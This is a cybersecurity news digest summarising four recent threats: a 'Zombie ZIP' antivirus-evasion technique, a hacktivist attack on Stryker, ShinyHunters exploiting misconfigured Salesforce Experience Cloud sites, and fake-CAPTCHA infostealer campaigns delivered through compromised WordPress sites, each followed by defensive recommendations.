1. “Zombie ZIP” Technique Allows Malware to Bypass Antivirus

Researchers have discovered a technique called “Zombie ZIP” (CVE-2026-0866) that allows malicious ZIP archives to evade detection by many antivirus tools. The attack works by manipulating archive metadata so security software incorrectly interprets the contents and fails to scan the compressed files inside. When opened with a specially crafted extraction process, the hidden payload can be reconstructed and executed, potentially allowing attackers to deliver malware through email attachments or downloads without being detected by traditional security tools. (tomshardware.com)

Why it matters: Malware that bypasses antivirus scanning significantly increases the risk of successful phishing campaigns.

Action: Use sandboxing, endpoint detection tools, and treat unexpected ZIP attachments as suspicious.

2. Iranian-Linked Hackers Claim Cyberattack on Medical Technology Company

An Iranian-linked hacking group known as Handala has claimed responsibility for a cyberattack targeting medical technology manufacturer Stryker, reportedly disrupting some internal systems. The attackers displayed messages on employee login screens and claimed the attack was politically motivated. Although investigations are ongoing, the incident highlights how healthcare technology companies are increasingly targeted due to the critical systems and sensitive data they manage. (reuters.com)

Why it matters: Disruption of internal systems at medical technology providers can cause hospital devices or software to go offline, delaying clinical operations and affecting patient care.

Action: Strengthen network segmentation and review third-party security risks.

3. Salesforce Experience Cloud Misconfiguration Leads to Data Exposure Claims

Salesforce issued a customer alert after the hacking group ShinyHunters claimed to have exploited misconfigured Salesforce Experience Cloud environments to extract data from public‑facing sites. The attacker used a modified version of an open‑source scanning tool to identify overly permissive guest user access settings, allowing them to harvest CRM data without needing valid credentials. Salesforce emphasised this was due to configuration issues rather than a platform vulnerability, and advised customers to audit guest user permissions and monitor logs for unusual activity. (itpro.com)

Why it matters: Misconfigurations in widely used enterprise platforms can expose sensitive business data to attackers without exploiting a software vulnerability.

Action: Review configuration and access controls for SaaS platforms like Salesforce Experience Cloud, disable unnecessary guest access, and strengthen monitoring of API and event logs.

4. Global Infostealer Operation Linked to Compromised WordPress Websites

Security researchers from Rapid7 reported that attackers are exploiting compromised WordPress websites to deliver multiple information-stealing malware families, including Vidar, Impure Stealer, and VodkaStealer. The infection chain typically begins when a user visits a compromised site and encounters the fake CAPTCHA prompt. Executing the provided command launches a PowerShell script that downloads the malware payload directly into memory. Because the attack leverages legitimate websites and multi-stage loaders, it can evade many traditional security controls. (rapid7.com)

Why it matters: Infostealer malware is commonly used to steal corporate credentials, which are later sold on criminal marketplaces or used for ransomware attacks.

Action: Deploy endpoint detection and response (EDR) tools and monitor systems for suspicious PowerShell activity.

Key Recommendations

• Deploy sandboxing and advanced endpoint/email security to catch malicious attachments.

• Audit SaaS platform configurations and restrict unnecessary guest/API access.

• Segment networks and enforce least-privilege access for critical systems.

• Monitor website integrity and patch CMS/software dependencies promptly.

• Train users to recognise phishing, malicious prompts, and suspicious activity.

• Enable rapid detection with EDR, SIEM, and log monitoring tools.